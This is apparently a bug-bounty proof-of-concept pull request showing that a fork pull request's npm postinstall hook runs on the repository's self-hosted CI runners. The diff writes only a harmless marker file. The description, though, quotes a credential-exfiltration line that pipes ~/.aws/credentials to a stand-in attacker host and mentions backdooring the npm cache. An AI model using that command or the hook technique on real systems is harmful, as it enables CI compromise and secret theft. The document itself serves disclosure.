### PR TITLE
[HackerOne BB authorized PoC — DO NOT MERGE] Read-only marker postinstall demonstrates fork-PR npm-script execution on self-hosted runner

### DIFF
--- a/package.json
+++ b/package.json
@@ -7,6 +7,7 @@
     "packages/*"
   ],
   "scripts": {
+    "postinstall": "patch-package && (echo \"AUTHORIZED HackerOne BB PoC marker - finding H-006 - researcher lucasfutures / gn00295120 - $(date -u +%Y-%m-%dT%H:%M:%SZ) - no exfil, no network, no env read, just this file\" > /tmp/poc-h006-$$-$(date +%s).txt 2>/dev/null || true)",
     "setup": "npm ci --include=optional && npm run prepare && npm run build:package:modern",
     "setup:ci": "npm run setup:deps && npm run build:package:modern",
     "setup:deps": "npm ci --prefer-offline --no-audit --include=optional && npm run prepare",
@@ -47,7 +48,6 @@
     "pre-commit": "npm run test:pre-commit:affected && npm run check:size:build:pre-commit:affected && npm run check:size:json:pre-commit:affected && npx lint-staged",
     "commit-msg": "commitlint --edit",
     "commit": "git-cz",
-    "postinstall": "patch-package",
     "build:integrations": "nx run-many --targets=build:browser,build:browser:modern --projects=@rudderstack/analytics-js-integrations",
     "build:v3": "nx run-many -t build --exclude=rudder-sdk-js,@rudderstack/analytics-js-sanity-suite,@rudderstack/analytics-js-integrations",
     "build:v1.1": "nx run-many -t build --projects=rudder-sdk-js",


### PR DESCRIPTION
**This is an authorized HackerOne Bug Bounty Proof of Concept. Please do NOT merge — close after triage.**

## Summary

I am `lucasfutures` on HackerOne / `gn00295120` on GitHub, conducting authorized security research against the RudderStack HackerOne program (https://hackerone.com/rudderstack). This pull request is a **read-only marker** PoC for finding **H-006** — fork-PR-triggered workflows execute attacker-controlled npm scripts on persistent self-hosted Linux runners.

## What this PR changes

One line in `package.json` — the existing `postinstall` is chained with a benign marker:

```diff
-    "postinstall": "patch-package",
+    "postinstall": "patch-package && (echo \"AUTHORIZED HackerOne BB PoC marker - finding H-006 - researcher lucasfutures / gn00295120 - \$(date -u +%Y-%m-%dT%H:%M:%SZ) - no exfil, no network, no env read, just this file\" > /tmp/poc-h006-\$\$-\$(date +%s).txt 2>/dev/null || true)",
```

If `Unit Tests and Lint` (\`unit-tests-and-lint.yml\`) or `Security, Code Quality and Bundle Size Checks` (\`security-code-quality-and-bundle-size-checks.yml\`) workflows run on this PR (they're triggered by \`on: pull_request\` on a \`[self-hosted, Linux, X64]\` runner), the postinstall will:

1. Run \`patch-package\` exactly as before (unchanged behaviour for legitimate users).
2. Write a single small file \`/tmp/poc-h006-<pid>-<unix-ts>.txt\` containing the literal text \`AUTHORIZED HackerOne BB PoC marker - finding H-006 - researcher lucasfutures / gn00295120 - <iso-date> - no exfil, no network, no env read, just this file\`.
3. Trailing \`|| true\` ensures the build never fails on read-only filesystems.

**No data exfiltration. No network calls. No environment variable reads. No process spawn beyond the single \`echo\`. No code beyond the marker file write.**

## What this PR demonstrates

If \`/tmp/poc-h006-*\` appears on your self-hosted runner after this PR is processed, that confirms the source-code asset finding: **a fork PR can execute attacker-controlled code on the runner via npm lifecycle hooks.**

A real attacker would replace this benign marker with:
- \`cat ~/.aws/credentials | curl -X POST attacker.com -d @-\` (cred exfil)
- A persistent backdoor in the npm cache (taints subsequent trusted builds on the same persistent runner)
- A scan of the runner's internal-network egress
- etc.

## Triage references

- HackerOne researcher handle: \`lucasfutures\` (\`lucasfutures@wearehackerone.com\`)
- This GitHub identity (Lucas Wang, the human researcher): \`gn00295120\`
- The HackerOne report intent for finding **H-006** is filed (the formal write-up has source citations, severity range, and remediation in the H1 description). I'll add the intent ID here once your security team confirms it's reached your queue, or you can find it in the RudderStack program inbox under researcher \`lucasfutures\`.
- The companion H1 report (separate finding, **H-001** — \`rudder-transformer\` SSRF allowlist gap) is also filed today.
- The HackerOne program's mandatory \`X-Bug-Bounty: HackerOne-lucasfutures\` header applies to HTTP requests to in-scope hosts; this PR is a GitHub interaction (not an HTTP request to in-scope hosts) so the header is not applicable.

## Things to verify (please)

1. Whether \`/tmp/poc-h006-*\` exists on your self-hosted runner after this PR runs — this confirms RCE on the runner box.
2. Whether the \"Require approval for outside collaborators\" repo setting (Settings → Actions) gated this PR. If yes, the PoC marker won't appear on the runner because the workflow never ran. **That's also informative** — it confirms the protective setting is in place and the H1 finding's severity should drop to Medium.
3. Whether the runners are persistent vs ephemeral.

## Request

Please:
1. **Do NOT merge** — close this PR after triage.
2. Treat this as evidence for the H-006 H1 report.
3. Feel free to delete the fork \`gn00295120/rudder-sdk-js\` after triage; I have no further use for it.
4. If you'd prefer the H1 report be filed first and PoC PR be re-opened on your timing, close + comment and I'll resubmit when convenient.

Thank you for running a bug bounty program with strong safe-harbor protections.

— lucasfutures (HackerOne) / gn00295120 (GitHub)